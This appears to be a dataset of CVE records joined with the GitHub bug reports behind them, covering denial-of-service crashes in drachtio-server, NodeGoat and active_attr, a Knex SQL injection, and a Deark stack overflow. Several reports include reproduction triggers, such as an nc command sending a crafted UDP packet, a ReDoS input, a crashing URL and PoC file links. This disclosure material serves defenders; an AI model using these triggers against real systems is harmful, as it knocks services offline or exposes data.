at ../src/controller.cpp:189
#8 0x00000000009ad356 in agent_recv_response (tport_via=<optimized out>, tport=<optimized out>, sip=<optimized out>, msg=<optimized out>, agent=<optimized out>) at nta.c:3573
#9 agent_recv_message (agent=0x61900000ff80, tport=<optimized out>, msg=<optimized out>, tport_via=<optimized out>, now=...) at nta.c:2955
#10 0x0000000000a22235 in tport_deliver (self=self@entry=0x616000001b80, msg=msg@entry=0x619000013180, next=next@entry=0x0, sc=<optimized out>, now=...) at tport.c:3097
#11 0x0000000000a227ab in tport_parse (self=self@entry=0x616000001b80, complete=1, now=...) at tport.c:3015
#12 0x0000000000a23ee0 in tport_recv_event (self=0x616000001b80) at tport.c:2954
#13 0x0000000000a2a300 in tport_base_wakeup (self=0x616000001b80, events=1) at tport.c:2855
#14 0x0000000000a83e5c in su_epoll_port_wait_events (self=0x611000001f80, tout=<optimized out>) at su_epoll_port.c:510
#15 0x0000000000a82a65 in su_base_port_run (self=0x611000001f80) at su_base_port.c:349
#16 0x00000000004dc07c in drachtio::DrachtioController::run (this=<optimized out>) at ../src/controller.cpp:1336
#17 0x00000000004647af in main (argc=9, argv=0x7fffffffe898) at ../src/main.cpp:47
(gdb)
```
```
# drachtio -v
v0.8.19
```
I suppose that the issue is in libsofia-sip, but filing here because I can reproduce via drachtio.
Attaching the testcase as zipped, but to reproduce you need to unzip and replace the string 'PUBLIC_IP' with the public IP address of the server
[assertion_failed.zip](https://github.com/drachtio/drachtio-server/files/10103585/assertion_failed.zip)
| CVE-2022-47516: tport.c:3313: tport_tsend: Assertion `self' failed. | https://api.github.com/repos/drachtio/drachtio-server/issues/244/comments | 4 | 2022-11-28T12:19:23Z | 2023-02-22T20:28:18Z | https://github.com/drachtio/drachtio-server/issues/244 | 1,466,329,337 | 244 | 4,523 |
CVE-2022-47517 | 2022-12-18T05:15:11.300 | An issue was discovered in the libsofia-sip fork in drachtio-server before 0.8.19. It allows remote attackers to cause a denial of service (daemon crash) via a crafted UDP message that causes a url_canonize2 heap-based buffer over-read because of an off-by-one error. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/22c1bd191f0acbf11f0c0fbea1845d9bf9dcd47e"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/bfc79d85c8f3a4798a3305fb98f5a11c11d0d29f"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/drachtio/drachtio-server/issues/243"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/22c1bd191f0acbf11f0c0fbea1845d9bf9dcd47e"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/davehorton/sofia-sip/commit/bfc79d85c8f3a4798a3305fb98f5a11c11d0d29f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/drachtio/drachtio-server/issues/243"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:drachtio:drachtio-server:*:*:*:*:*:*:*:*",
"matchCriteriaId": "24320D84-70B3-4A0E-AE01-D5DCF0AD5848",
"versionEndExcluding": "0.8.19",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"193"
] | 193 | https://github.com/drachtio/drachtio-server/issues/243 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"drachtio",
"drachtio-server"
] | Hi,
the following remote request is able to crash drachtio:
```
nc -u PUBLIC_IP 5060 < file
==3439==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f0000012ba at pc 0x000000a45552 bp 0x7ffcb041b950 sp 0x7ffcb041b948
READ of size 1 at 0x60f0000012ba thread T0
#0 0xa45551 in url_canonize2 /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/url/url.c:367
#1 0xa4756b in url_d /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/url/url.c:802
#2 0x9bd29d in sip_name_addr_d /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/sip/sip_basic.c:725
#3 0x9bd9b1 in sip_contact_d /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/sip/sip_basic.c:1407
#4 0x9556c5 in header_parse /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1132
#5 0x9556c5 in extract_header /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1071
#6 0x958e4e in extract_next /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1001
#7 0x958e4e in msg_extract /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:903
#8 0xa224f1 in tport_parse /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2984
#9 0xa23edf in tport_recv_event /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2954
#10 0xa2a2ff in tport_base_wakeup /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2855
#11 0xa83e2b in su_epoll_port_wait_events /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_epoll_port.c:510
#12 0xa82a34 in su_base_port_run /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_base_port.c:349
#13 0x4dc07b in drachtio::DrachtioController::run() ../src/controller.cpp:1336
#14 0x4647ae in main ../src/main.cpp:47
#15 0x7fcb1ded1d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
#16 0x4846a9 in _start (/usr/local/bin/drachtio-asan+0x4846a9)
0x60f0000012ba is located 0 bytes to the right of 170-byte region [0x60f000001210,0x60f0000012ba)
allocated by thread T0 here:
#0 0x7fcb1e8b8e8f in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x9eadce in sub_alloc /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_alloc.c:541
#2 0x9ebaaa in su_alloc /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_alloc.c:960
#3 0x954ab7 in msg_header_alloc /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:2314
#4 0x955eaf in header_parse /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1114
#5 0x955eaf in extract_header /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1071
#6 0x958e4e in extract_next /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:1001
#7 0x958e4e in msg_extract /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/msg/msg_parser.c:903
#8 0xa224f1 in tport_parse /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2984
#9 0xa23edf in tport_recv_event /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2954
#10 0xa2a2ff in tport_base_wakeup /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/tport/tport.c:2855
#11 0xa83e2b in su_epoll_port_wait_events /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_epoll_port.c:510
#12 0xa82a34 in su_base_port_run /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/su/su_base_port.c:349
#13 0x4dc07b in drachtio::DrachtioController::run() ../src/controller.cpp:1336
#14 0x4647ae in main ../src/main.cpp:47
#15 0x7fcb1ded1d09 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x23d09)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/src/drachtio-server/deps/sofia-sip/libsofia-sip-ua/url/url.c:367 in url_canonize2
Shadow bytes around the buggy address:
0x0c1e7fff8200: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
0x0c1e7fff8210: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa
0x0c1e7fff8220: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
0x0c1e7fff8230: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x0c1e7fff8240: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c1e7fff8250: 00 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa
0x0c1e7fff8260: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8270: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8280: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8290: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff82a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3439==ABORTING
```
While I'm not sure if the issue is in libsofia-sip or drachtio, my guess is that it is in libsofia-sip but I'm filing the issue
here because I can reproduce via drachtio.
I'm on v0.8.19-rc12
```
# drachtio -v
4f3530f
```
Attaching the testcase as zipped, but to reproduce you need to unzip.
[off-by-one.zip](https://github.com/drachtio/drachtio-server/files/10096959/off-by-one.zip)
| CVE-2022-47517: heap-based buffer overflow in (url_canonize2 libsofia-sip-ua/url/url.c ?) | https://api.github.com/repos/drachtio/drachtio-server/issues/243/comments | 9 | 2022-11-26T20:17:55Z | 2023-02-22T20:20:06Z | https://github.com/drachtio/drachtio-server/issues/243 | 1,465,246,697 | 243 | 4,524 |
CVE-2021-4247 | 2022-12-18T08:15:09.267 | A vulnerability has been found in OWASP NodeGoat and classified as problematic. This vulnerability affects unknown code of the file app/routes/research.js of the component Query Parameter Handler. The manipulation leads to denial of service. The attack can be initiated remotely. The name of the patch is 4a4d1db74c63fb4ff8d366551c3af006c25ead12. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216184. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/OWASP/NodeGoat/commit/4a4d1db74c63fb4ff8d366551c3af006c25ead12"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/OWASP/NodeGoat/issues/225"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216184"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/OWASP/NodeGoat/commit/4a4d1db74c63fb4ff8d366551c3af006c25ead12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/OWASP/NodeGoat/issues/225"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216184"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:owasp:nodegoat:*:*:*:*:*:*:*:*",
"matchCriteriaId": "03504CFB-4D4E-4A9E-A7D6-564661D5661B",
"versionEndExcluding": "2021-01-26",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"404"
] | 404 | https://github.com/OWASP/NodeGoat/issues/225 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"OWASP",
"NodeGoat"
] | The research page intentionally exposes a SSRF vulnerability which allows an attacker to submit unexpected `url` and `query` params. The tutorial demonstrates how this can be used to make the server connect to an attacker-controlled site.
As well as this expected vulnerability there's a bug in [app/routes/research.js](https://github.com/OWASP/NodeGoat/blob/f2514a5f71c69d5639d56e88980b86d31a20b436/app/routes/research.js) which crashes the server if the request to that target URL fails.
This happens when visiting (eg) `http://localhost:4000/research?url=localhost%3A4001%2F&symbol=login` while the server is running locally on port 4000:
```
[...]\app\routes\research.js:23
res.write(newResponse.body);
^
TypeError: Cannot read property 'body' of undefined
at [...]\app\routes\research.js:23:39
at done ([...]\node_modules\needle\lib\needle.js:442:14)
at ClientRequest.had_error ([...]\node_modules\needle\lib\needle.js:452:5)
at ClientRequest.emit (events.js:310:20)
at Socket.socketErrorListener (_http_client.js:426:9)
at Socket.emit (events.js:310:20)
at emitErrorNT (internal/streams/destroy.js:92:8)
at emitErrorAndCloseNT (internal/streams/destroy.js:60:3)
at processTicksAndRejections (internal/process/task_queues.js:84:21)
```
What's happening is that the needle callback skips setting the content-type when there's an error, but still tries to append `newResponse.body` to `res`. If there's an error, `newResponse` is undefined and the server crashes. | NodeGoat Research page SSRF also enables DoS | https://api.github.com/repos/OWASP/NodeGoat/issues/225/comments | 1 | 2021-01-24T16:48:22Z | 2021-02-07T12:58:55Z | https://github.com/OWASP/NodeGoat/issues/225 | 792,841,085 | 225 | 4,525 |
CVE-2021-4250 | 2022-12-18T22:15:10.080 | A vulnerability classified as problematic has been found in cgriego active_attr up to 0.15.2. This affects the function call of the file lib/active_attr/typecasting/boolean_typecaster.rb of the component Regex Handler. The manipulation of the argument value leads to denial of service. The exploit has been disclosed to the public and may be used. Upgrading to version 0.15.3 is able to address this issue. The name of the patch is dab95e5843b01525444b82bd7b336ef1d79377df. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216207. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 3.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 1.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/commit/dab95e5843b01525444b82bd7b336ef1d79377df"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/issues/184"
},
{
"source": "cna@vuldb.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/pull/185"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/releases/tag/v0.15.3"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/commit/dab95e5843b01525444b82bd7b336ef1d79377df"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/issues/184"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/pull/185"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes",
"Third Party Advisory"
],
"url": "https://github.com/cgriego/active_attr/releases/tag/v0.15.3"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.216207"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:active_attr_project:active_attr:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D27E608-351C-4813-BC6C-06EB8B9DF82C",
"versionEndExcluding": "0.15.3",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"404"
] | 404 | https://github.com/cgriego/active_attr/issues/184 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"cgriego",
"active_attr"
] | ## Detail
This method determines if it matches the following regular expression.
https://github.com/cgriego/active_attr/blob/v0.15.2/lib/active_attr/typecasting/boolean_typecaster.rb#L45
For example, it will take a lot of time to match if the input is something like this.
```
"#{?0 * 100000}a" =~ /\A[-+]?(0+\.?0*|0*\.?0+)\z/
```
## Solution
Use possessive quantifier.
This will return an immediate result for the input in question, while maintaining compatibility.
```
diff --git a/lib/active_attr/typecasting/boolean_typecaster.rb b/lib/active_attr/typecasting/boolean_typecaster.rb
index 8b84102..5250ca8 100644
--- a/lib/active_attr/typecasting/boolean_typecaster.rb
+++ b/lib/active_attr/typecasting/boolean_typecaster.rb
@@ -42,7 +42,7 @@ module ActiveAttr
case value
when *FALSE_VALUES then false
when *NIL_VALUES then nil
- when Numeric, /\A[-+]?(0+\.?0*|0*\.?0+)\z/ then !value.to_f.zero?
+ when Numeric, /\A[-+]?(0++\.?0*|0*+\.?0+)\z/ then !value.to_f.zero?
else value.present?
end
end
```` | ReDoS vulnerability in ActiveAttr::Typecasting::BooleanTypecaster#call | https://api.github.com/repos/cgriego/active_attr/issues/184/comments | 2 | 2021-03-14T14:25:55Z | 2021-04-12T21:06:15Z | https://github.com/cgriego/active_attr/issues/184 | 831,170,221 | 184 | 4,526 |
CVE-2016-20018 | 2022-12-19T09:15:09.290 | Knex Knex.js through 2.3.0 has a limited SQL injection vulnerability that can be exploited to ignore the WHERE clause of a SQL query. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/knex/knex/issues/1227"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-20018"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.ghostccamm.com/blog/knex_sqli/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/knex/knex/issues/1227"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://nvd.nist.gov/vuln/detail/CVE-2016-20018"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://www.ghostccamm.com/blog/knex_sqli/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:knexjs:knex:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "E98C1AAA-9F34-4FD5-A7BB-9BF54EC47E53",
"versionEndExcluding": null,
"versionEndIncluding": "2.3.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/knex/knex/issues/1227 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"knex",
"knex"
] | > ## Update 2023-09-07
> For people coming back to this because they got CVE notification
> This alleged SQLi bug can only be allegedly possible **if you are using mysql as your backend.**
> If you are using any other backend, you are not affected and can move on and ignore this.
> In fact it would be better for you guys to ignore this because the "fixes" that have been introduced break core functionality and introduce a lot of issues so far.
This is a really weird bug but if you do:
```
knex('sometable').where({
stringfield: { hello: 1 }
})
```
It will crash with `Unknown column 'hello' in 'where clause']` which is an EXTREMELY scary message to see considering the almost potential(?) possibility of doing SQL injection or something.
This only happens though when using the `mysql` client, tested with `pg` and it worked as it should, giving empty result.
Here's a working gist reproducing the problem: https://gist.github.com/TheThing/00be586e2d71e7b9a4b8
| knex where is not escaping field objects with mysql engine (potential SQL injection?) | https://api.github.com/repos/knex/knex/issues/1227/comments | 43 | 2016-02-25T17:01:06Z | 2024-06-04T04:30:13Z | https://github.com/knex/knex/issues/1227 | 136,447,255 | 1,227 | 4,527 |
CVE-2022-43289 | 2022-12-19T18:15:11.190 | Deark v.1.6.2 was discovered to contain a stack overflow via the do_prism_read_palette() function at /modules/atari-img.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jsummers/deark"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jsummers/deark/issues/52"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/jsummers/deark"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jsummers/deark/issues/52"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:entropymine:deark:1.6.2:*:*:*:*:*:*:*",
"matchCriteriaId": "69BC1B77-4B6A-433E-9C60-EFDA3449637C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/jsummers/deark/issues/52 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jsummers",
"deark"
] | ### Description
A stack-buffer-overflow bug was discovered in function do_prism_read_palette modules/atari-img.c:331
### Version
Version v1.6.2 (Lastest commit)
### Environment
Ubuntu 18.04, 64bit
### Reproduce
Command
```
git clone the Lastest Version firstly.
make && make install
./deark -l -zip ./poc
```
POC file at the bottom of this report.
### ASAN Report
```
Module: prismpaint
=================================================================
==20784==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc6490a820 at pc 0x55eae0de20ff bp 0x7ffc6490a390 sp 0x7ffc6490a380
READ of size 4 at 0x7ffc6490a820 thread T0
#0 0x55eae0de20fe in do_prism_read_palette modules/atari-img.c:331
#1 0x55eae0de247e in de_run_prismpaint modules/atari-img.c:361
#2 0x55eae0fd7023 in de_run_module src/deark-util.c:878
#3 0x55eae0fd7023 in de_run_module src/deark-util.c:843
#4 0x55eae1036a35 in de_run src/deark-user.c:452
#5 0x55eae0dc39e9 in main2 src/deark-cmd.c:988
#6 0x55eae0dc39e9 in main src/deark-cmd.c:1022
#7 0x7fd587ac4082 in __libc_start_main ../csu/libc-start.c:308
#8 0x55eae0dc652d in _start (/AFLplusplus/my_test/deark/backup/asan/deark-master/deark+0xf652d)
Address 0x7ffc6490a820 is located in stack of thread T0 at offset 1056 in frame
#0 0x55eae0de1c7f in do_prism_read_palette modules/atari-img.c:304
This frame has 2 object(s):
[32, 1056) 'pal1' (line 308) <== Memory access at offset 1056 overflows this variable
[1184, 1216) 'tmps' (line 310)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow modules/atari-img.c:331 in do_prism_read_palette
Shadow bytes around the buggy address:
0x10000c9194b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c9194c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c9194d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c9194e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c9194f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10000c919500: 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
0x10000c919510: f2 f2 f2 f2 00 00 00 00 f3 f3 f3 f3 00 00 00 00
0x10000c919520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c919530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c919540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10000c919550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
```
### POC
[id_000027,sig_11,src_013544+002505,time_31840218,execs_68965869,op_splice,rep_16.zip](https://github.com/jsummers/deark/files/9594078/id_000027.sig_11.src_013544%2B002505.time_31840218.execs_68965869.op_splice.rep_16.zip)
Any issue plz contact with me:
asteriska001@gmail.com
OR:
twitter: @Asteriska8 | A stack-buffer-overflow bug was discovered. | https://api.github.com/repos/jsummers/deark/issues/52/comments | 1 | 2022-09-18T13:37:37Z | 2022-10-14T15:41:22Z | https://github.com/jsummers/deark/issues/52 | 1,377,062,054 | 52 | 4,528 |
